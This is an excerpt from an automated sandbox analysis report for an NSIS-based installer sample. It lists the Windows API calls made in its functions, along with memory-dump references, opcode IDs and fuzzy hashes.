                                                                                                          • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,76F923A0), ref: 0040520F
                                                                                                          • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2531174081-0
                                                                                                          • Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                          • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                          • Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                          • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                          • GetMessagePos.USER32 ref: 00404AA1
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                          • String ID: f
                                                                                                          • API String ID: 41195575-1993550816
                                                                                                          • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                          • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                          • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                          • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                          APIs
                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                          • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                                                                                          • wsprintfW.USER32 ref: 00402D5D
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                          Strings
                                                                                                          • verifying installer: %d%%, xrefs: 00402D57
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                          • String ID: verifying installer: %d%%
                                                                                                          • API String ID: 1451636040-82062127
                                                                                                          • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                          • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                          • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                          • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                          • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 2667972263-0
                                                                                                          • Opcode ID: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                          • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                          • Opcode Fuzzy Hash: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                          • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                          APIs
                                                                                                          • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,76F93420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                          • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                          • CharNextW.USER32(0040A300,0043F000,76F93420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                          • CharPrevW.USER32(0040A300,0040A300,76F93420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Char$Next$Prev
                                                                                                          • String ID: *?|<>/":
                                                                                                          • API String ID: 589700163-165019052
                                                                                                          • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                          • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                          • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                          • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                          APIs
                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                            • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,76F923A0), ref: 0040520F
                                                                                                            • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                          • String ID:
                                                                                                          • API String ID: 1941528284-0
                                                                                                          • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                          • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                          • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                          • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1912718029-0
                                                                                                          • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                          • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                          • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                          • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1849352358-0
                                                                                                          • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                          • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                          • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                          • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                          APIs
                                                                                                          • GetDC.USER32(?), ref: 00401D59
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                          • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 3808545654-0
                                                                                                          • Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                          • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                          • Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                          • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                          • wsprintfW.USER32 ref: 00404A1A
                                                                                                          • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                          • String ID: %u.%u%s%s
                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                          • Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                          • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                          • Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                          • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Timeout
                                                                                                          • String ID: !
                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                          • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                          • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                          • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                          • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                          APIs
                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                          • wsprintfW.USER32 ref: 00406411
                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                          • String ID: %s%S.dll
                                                                                                          • API String ID: 2200240437-2744773210
                                                                                                          • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                          • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                          • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                          • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                          APIs
                                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                          • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1356686001-0
                                                                                                          • Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                          • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                          • Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                          • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668
                                                                                                          APIs
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,76F923A0), ref: 0040520F
                                                                                                            • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                            • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 3585118688-0
                                                                                                          • Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                          • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                          • Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                          • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                          APIs
                                                                                                          • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                          • GetLastError.KERNEL32 ref: 004056DA
                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                          • GetLastError.KERNEL32 ref: 004056F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                          • String ID:
                                                                                                          • API String ID: 3449924974-0
                                                                                                          • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                          • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                          • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                          • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9
                                                                                                          APIs
